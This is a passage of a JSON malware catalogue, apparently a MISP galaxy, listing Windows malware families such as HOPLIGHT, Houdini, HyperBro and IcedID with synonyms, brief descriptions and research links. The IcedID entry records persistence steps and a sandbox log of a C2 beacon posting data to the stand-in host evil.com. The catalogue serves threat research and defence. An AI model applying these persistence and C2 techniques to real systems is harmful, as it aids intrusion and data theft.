"HiKit" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.himan", "https://www.checkpoint.com/threatcloud-central/downloads/check-point-himan-malware-analysis.pdf" ], "synonyms": [], "type": [] }, "uuid": "ecad37b9-555a-4029-b181-6f272eed7154", "value": "himan" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.himera_loader", "https://twitter.com/James_inthe_box/status/1260191589789392898" ], "synonyms": [], "type": [] }, "uuid": "b5e83cab-8096-40de-8a5b-5bf0f2e336b2", "value": "Himera Loader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hisoka", "https://unit42.paloaltonetworks.com/xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations/" ], "synonyms": [], "type": [] }, "uuid": "b6734ca0-599f-4992-9094-218d01ddfb3a", "value": "Hisoka" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hi_zor_rat", "https://www.fidelissecurity.com/threatgeek/2016/01/introducing-hi-zor-rat" ], "synonyms": [], "type": [] }, "uuid": "80987ce7-7eb7-4e55-95f8-5c7a9441acab", "value": "Hi-Zor RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hlux" ], "synonyms": [], "type": [] }, "uuid": "8e056957-f28b-4b2f-bf58-6b2f7fdd7d62", "value": "HLUX" }, { "description": "Adware, tied to eGobbler and Nephos7 campaigns, ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.holcus", "https://blog.confiant.com/malvertising-made-in-china-f5081521b3f0" ], "synonyms": [], "type": [] }, "uuid": "379356c7-ec7a-4880-85d5-afe9608d6b60", "value": "Holcus Installer (Adware)" }, { "description": " a 64-bit Windows password dumper/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors. Some strings are obfuscated with XOR x56. The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and malware version for each login session.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.homefry", "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", "https://www.secureworks.com/research/threat-profiles/bronze-mohawk" ], "synonyms": [], "type": [] }, "uuid": "1fb57e31-b97e-45c3-a922-a49ed6dd966d", "value": "homefry" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hookinjex", "https://twitter.com/CDA/status/1014144988454772736", "https://research.checkpoint.com/2020/rampant-kitten-an-iranian-espionage-campaign/" ], "synonyms": [], "type": [] }, "uuid": "b614f291-dbf8-49ed-b110-b69ab6e8c6e5", "value": "HookInjEx" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hoplight", "https://www.us-cert.gov/ncas/analysis-reports/ar20-045g", "https://www.us-cert.gov/ncas/analysis-reports/AR19-100A", "https://www.us-cert.gov/ncas/analysis-reports/ar19-304a", "https://www.secureworks.com/research/threat-profiles/nickel-academy", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://www.fireeye.com/content/dam/fireeye-www/global/en/blog/threat-research/FireEye_HWP_ZeroDay.pdf", "https://www.computing.co.uk/ctg/news/3074007/lazarus-rises-warning-over-new-hoplight-malware-linked-with-north-korea", "https://securelist.com/apt-trends-report-q2-2019/91897/", "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", "https://researchcenter.paloaltonetworks.com/2017/08/unit42-blockbuster-saga-continues/" ], "synonyms": [ "HANGMAN" ], "type": [] }, "uuid": "3e489132-8687-46b3-b9a7-74ba8fafaddf", "value": "HOPLIGHT" }, { "description": "Hopscotch is part of the Regin framework.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hopscotch", "https://www.youtube.com/watch?v=VnzP00DZlx4" ], "synonyms": [], "type": [] }, "uuid": "0ab4f3ce-5474-4b1e-8ad9-b9ad80e75be8", "value": "Hopscotch" }, { "description": "Remote Acess Tool Written in VB.NET.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.horuseyes", "https://github.com/arsium/HorusEyesRat_Public" ], "synonyms": [], "type": [] }, "uuid": "cbe47d19-2f74-4dbc-84b5-44c31518c8a7", "value": "HorusEyes RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hotcroissant", "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/", "https://www.us-cert.gov/ncas/analysis-reports/ar20-045d", "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/" ], "synonyms": [], "type": [] }, "uuid": "4500694c-d71a-4d11-8f9c-0036156826b6", "value": "HOTCROISSANT" }, { "description": "HOTWAX is a module that upon starting imports all necessary system API functions, and searches for a .CHM file. HOTWAX decrypts a payload using the Spritz algorithm with a hard-coded key and then searches the target process and attempts to inject the decrypted payload module from the CHM file into the address space of the target process.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hotwax", "https://content.fireeye.com/apt/rpt-apt38", "https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf", "https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf" ], "synonyms": [], "type": [] }, "uuid": "d5391c00-9a75-457c-9ef0-0a75c5df8348", "value": "HOTWAX" }, { "description": "Houdini is a VBS-based RAT dating back to 2013. Past in the days, it used to be wrapped in an .exe but started being spamvertized or downloaded by other malware directly as .vbs in 2018. In 2019, WSHRAT appeared, a Javascript-based version of Houdini, recoded by the name of Kognito.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.houdini", "https://cybersecurity.att.com/blogs/labs-research/alien-labs-2019-analysis-of-threat-groups-molerats-and-apt-c-37", "https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/", "https://www.fireeye.com/blog/threat-research/2013/09/now-you-see-me-h-worm-by-houdini.html", "https://www.youtube.com/watch?v=h3KLKCdMUUY", "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g", "https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/wsh_rat.md", "https://www.binarydefense.com/revenge-is-a-dish-best-served-obfuscated", "https://myonlinesecurity.co.uk/more-agenttesla-keylogger-and-nanocore-rat-in-one-bundle/", "https://blogs.360.cn/post/APT-C-44.html", "http://blog.morphisec.com/hworm-houdini-aka-njrat", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "http://blogs.360.cn/post/analysis-of-apt-c-37.html", "https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks", "https://cofense.com/houdini-worm-transformed-new-phishing-attack/" ], "synonyms": [ "Hworm", "Jenxcus", "Kognito", "Njw0rm", "WSHRAT", "dinihou", "dunihi" ], "type": [] }, "uuid": "11775f11-03a0-4ba8-932f-c125dfb66e35", "value": "Houdini" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.htbot" ], "synonyms": [], "type": [] }, "uuid": "246f62ee-854a-45e9-8c57-34f1fb72762f", "value": "HtBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.htprat", "https://www.riskiq.com/blog/labs/htprat/" ], "synonyms": [], "type": [] }, "uuid": "e8d1a1f3-3170-4562-9a18-cadf000e48d0", "value": "htpRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.htran", "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf", "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", "https://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/", "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/", "https://www.secureworks.com/research/threat-profiles/bronze-mayfair", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-atlas", "https://www.secureworks.com/research/htran", "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/" ], "synonyms": [ "HUC Packet Transmit Tool" ], "type": [] }, "uuid": "3fb18a77-91ef-4c68-a9a9-fa6bdbea38e8", "value": "HTran" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpbrowser", "https://www.threatconnect.com/blog/threatconnect-discovers-chinese-apt-activity-in-europe/", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/emissary-panda-a-potential-new-malicious-tool/", "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-union", "https://threatconnect.com/blog/the-anthem-hack-all-roads-lead-to-china/" ], "synonyms": [ "HttpDump" ], "type": [] }, "uuid": "79f93d04-f6c8-4705-9395-7f575a61e82f", "value": "HttpBrowser" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpdropper", "https://www.sans.org/reading-room/whitepapers/critical/tracing-lineage-darkseoul-36787", "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/dissecting-operation-troy.pdf", "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html" ], "synonyms": [ "httpdr0pper" ], "type": [] }, "uuid": "78336551-c18e-47ac-8bef-1c0c61c0e0a9", "value": "httpdropper" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.http_troy", "https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf", "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html" ], "synonyms": [], "type": [] }, "uuid": "339b3e7c-7a4a-4a1a-94b6-555f15a0b265", "value": "http_troy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hunter", "https://twitter.com/3xp0rtblog/status/1324800226381758471" ], "synonyms": [], "type": [] }, "uuid": "c93fdbb9-aafc-441d-a66f-aaf038f10bd3", "value": "Hunter Stealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hupigon", "https://www.proofpoint.com/us/threat-insight/post/threat-actors-repurpose-hupigon-adult-dating-attacks-targeting-us-universities" ], "synonyms": [], "type": [] }, "uuid": "40157734-eb33-4187-bcc8-2cd168db6fda", "value": "Hupigon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hussar", "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/" ], "synonyms": [], "type": [] }, "uuid": "d3d86184-3c5c-478b-8f8b-f56f1a02247d", "value": "Hussar" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hxdef", "https://de.securelist.com/malware-entwicklung-im-ersten-halbjahr-2007/59574/" ], "synonyms": [ "HacDef", "HackDef", "HackerDefender" ], "type": [] }, "uuid": "906adc27-757d-42bd-b8a2-f8a134077343", "value": "HxDef" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperbro", "http://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/", "https://blog.team-cymru.com/2020/03/25/how-the-iranian-cyber-security-agency-detects-emissary-panda-malware/", "https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox", "https://team-cymru.com/2020/03/25/how-the-iranian-cyber-security-agency-detects-emissary-panda-malware/", "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/", "https://www.secureworks.com/research/threat-profiles/bronze-union", "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia", "https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/", "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/", "https://securelist.com/luckymouse-hits-national-data-center/86083/" ], "synonyms": [], "type": [] }, "uuid": "b7f1abd3-870b-42ca-9bd1-5931126c68d5", "value": "HyperBro" }, { "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid", "https://www.microsoft.com/security/blog/2020/12/09/edr-in-block-mode-stops-icedid-cold/", "https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware", "https://www.youtube.com/watch?v=wObF9n2UIAM", "https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7", "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/", "https://www.f5.com/labs/articles/threat-intelligence/icedid-banking-trojan-uses-covid-19-pandemic-to-lure-new-victims", "https://tccontre.blogspot.com/2020/08/learning-from-iceid-loader-including.html", "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", "https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-two.html", "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/", "https://securityintelligence.com/icedid-banking-trojan-spruces-up-injection-tactics-to-add-stealth/", "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/", "https://tccontre.blogspot.com/2021/01/", "https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://zero2auto.com/2020/06/22/unpacking-visual-basic-packers/", "https://www.group-ib.com/blog/icedid", "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", "https://www.youtube.com/watch?v=7Dk7NkIbVqY", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", "https://unit42.paloaltonetworks.com/ta551-shathak-icedid/", "https://blog.talosintelligence.com/2020/07/valak-emerges.html", "https://www.nri-secure.co.jp/blog/explaining-the-tendency-of-malware-icedid", "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", "https://blog.cyberint.com/icedid-stealer-man-in-the-browser-banking-trojan", "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", "https://kienmanowar.wordpress.com/2020/08/16/manual-unpacking-icedid-write-up/", "https://github.com/f0wl/deICEr", "https://securityintelligence.com/icedid-operators-using-atsengine-injection-panel-to-hit-e-commerce-sites/", "https://medium.com/@dawid.golak/icedid-aka-bokbot-analysis-with-ghidra-560e3eccb766", "https://blog.malwarebytes.com/threat-analysis/2019/12/new-version-of-icedid-trojan-uses-steganographic-payloads/", "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware", "https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/", "https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-one.html", "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/", "https://gist.github.com/psrok1/e6bf5851d674edda03a201e7f24a5e6b", "https://www.crowdstrike.com/blog/bokbots-man-in-the-browser-overview/", "https://blog.talosintelligence.com/2018/04/icedid-banking-trojan.html", "https://www.secureworks.com/research/threat-profiles/gold-swathmore", "https://www.crowdstrike.com/blog/digging-into-bokbots-core-module/", "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", "https://www.fortinet.com/blog/threat-research/deep-dive-icedid-malware-analysis-of-child-processes.html", "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", "https://blogs.juniper.net/en-us/threat-research/iceid-campaign-strikes-back" ], "synonyms": [ "BokBot", "IceID" ], "type": [] }, "uuid": "26f5afaf-0bd7-4741-91ab-917bdd837330", "value": "IcedID" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid_downloader", "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/", "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/" ], "synonyms": [], "type": [] }, "uuid": "c3be9189-f8f2-45e4-b6a3-8960fd5ffc16", "value": "IcedID Downloader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icefog", "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", "http://www.kz-cert.kz/page/502", "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf", "https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt", "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko" ], "synonyms": [ "Fucobha" ], "type": [] }, "uuid": "48cdcbcf-38a8-4c68-a85e-42989ca28861", "value": "Icefog" }, { "description": "The ICE IX bot is a banking trojan derived of the Zeus botnet because it uses significant parts of Zeus’s source code. ICE IX communicates using the HTTP protocol, so it can be considered to be a third-generation botnet. While it has been used for a variety of purposes, a primary threat of ICE IX comes from its manipulation of banking operations on compromised machines. As with any bot, execution of the bot results in establishing a master-slave relationship between the botmaster and the compromised computer.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ice_ix", "https://securelist.com/ice-ix-the-first-crimeware-based-on-the-leaked-zeus-sources/29577/", "https://blog.trendmicro.com/trendlabs-security-intelligence/zeus-gets-another-update/", "https://securelist.com/ice-ix-not-cool-at-all/29111/", "https://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus" ], "synonyms": [], "type": [] }, "uuid": "44a1706e-f6dc-43ea-ac85-9a4f2407b9a3", "value": "Ice IX" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icondown", "https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html" ], "synonyms": [], "type": [] }, "uuid": "4f7ae3da-948c-4f74-8229-d5d7461f9c7d", "value": "IconDown" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icyheart" ], "synonyms": [ "Troxen" ], "type": [] }, "uuid": "bcc8b6ea-9295-4a22-a70d-422b1fd9814e", "value": "IcyHeart" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.idkey", "https://isc.sans.edu/diary/22766" ], "synonyms": [], "type": [] }, "uuid": "3afecded-3461-45f9-8159-e8328e56a916", "value": "IDKEY" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.iisniff", "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Curious-Case-of-the-Malicious-IIS-Module/" ], "synonyms": [], "type": [] }, "uuid": "3b746f77-214b-44f9-9ef2-0ae6b52561d6", "value": "IISniff" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.imecab", "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east", "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east" ], "synonyms": [], "type": [] }, "uuid": "0ea585ef-bd32-4f5b-a3fe-bb48dc0956c7", "value": "Imecab" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.imminent_monitor_rat", "https://www.secureworks.com/research/threat-profiles/cobalt-trinity", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/", "https://itsjack.cc/blog/2016/01/imminent-monitor-4-rat-analysis-a-glance/", "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", "https://www.tripwire.com/state-of-security/featured/man-jailed-using-webcam-rat-women-bedrooms/" ], "synonyms": [], "type": [] }, "uuid": "53021414-97ad-4102-9cff-7a0e1997f867", "value": "Imminent Monitor RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.immortal_stealer", "https://www.zscaler.com/blogs/research/immortal-information-stealer" ], "synonyms": [], "type": [] }, "uuid": "5f688e85-5f33-4ae6-880a-fc2e5146dd28", "value": " Immortal Stealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.indigodrop", "https://blog.talosintelligence.com/2020/06/indigodrop-maldocs-cobalt-strike.html", "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html" ], "synonyms": [], "type": [] }, "uuid": "e98b19ce-82c3-472d-98d1-d81341af4267", "value": "IndigoDrop" }, { "description": "Industroyer is a malware framework considered to have been used in the cyberattack on Ukraine’s power grid on December 17, 2016. The attack cut a fifth of Kiev, the capital, off power for one hour. It is the first ever known malware specifically designed to attack electrical grids.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.industroyer", "https://en.wikipedia.org/wiki/Industroyer", "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too", "https://hub.dragos.com/hubfs/Whitepaper-Downloads/Dragos_Manufacturing%20Threat%20Perspective_1120.pdf", "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/", "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf", "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/", "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf", "https://www.virusbulletin.com/conference/vb2017/abstracts/last-minute-paper-industroyer-biggest-threat-industrial-control-systems-stuxnet/", "https://www.secureworks.com/research/threat-profiles/iron-viking", "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games", "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", "https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/", "https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security", "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" ], "synonyms": [ "Crash", "CrashOverride" ], "type": [] }, "uuid": "610d5ce7-c9c8-4fb1-94d9-69b7cb5397b6", "value": "Industroyer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.inferno", "https://github.com/LimerBoy/Inferno" ], "synonyms": [], "type": [] }, "uuid": "7638ac2e-0cdc-4101-8e3d-54b7b74a9c92", "value": "Inferno" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.infodot", "https://id-ransomware.blogspot.com/2019/10/infodot-ransomware.html" ], "synonyms": [], "type": [] }, "uuid": "e0ce5055-45cd-46d2-971f-bb3904ec43a1", "value": "InfoDot Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.infy", "https://github.com/pan-unit42/iocs/blob/master/prince_of_persia/hashes.csv", "http://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/", "https://cloud.tencent.com/developer/article/1738806", "https://www.intezer.com/prince-of-persia-the-sands-of-foudre/", "http://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/", "https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/", "https://download.bitdefender.com/resources/files/News/CaseStudies/study/393/Bitdefender-Whitepaper-Iranian-APT-Makes-a-Comeback-with-Thunder-and-Lightning-Backdoor-and-Espionage-Combo.pdf", "https://research.checkpoint.com/2021/after-lightning-comes-thunder/", "https://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/" ], "synonyms": [ "Foudre" ], "type": [] }, "uuid": "53616ce4-9b8e-45a0-b380-9e778cd95ae2", "value": "Infy" }, { "description": "InnaputRAT, a RAT capable of exfiltrating files from victim machines, was distributed by threat actors using phishing and Godzilla Loader. The RAT has evolved through multiple variants dating back to 2016. Recent campaigns distributing InnaputRAT beaconed to live C2 as of March 26, 2018.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.innaput_rat", "https://asert.arbornetworks.com/innaput-actors-utilize-remote-access-trojan-since-2016-presumably-targeting-victim-files/" ], 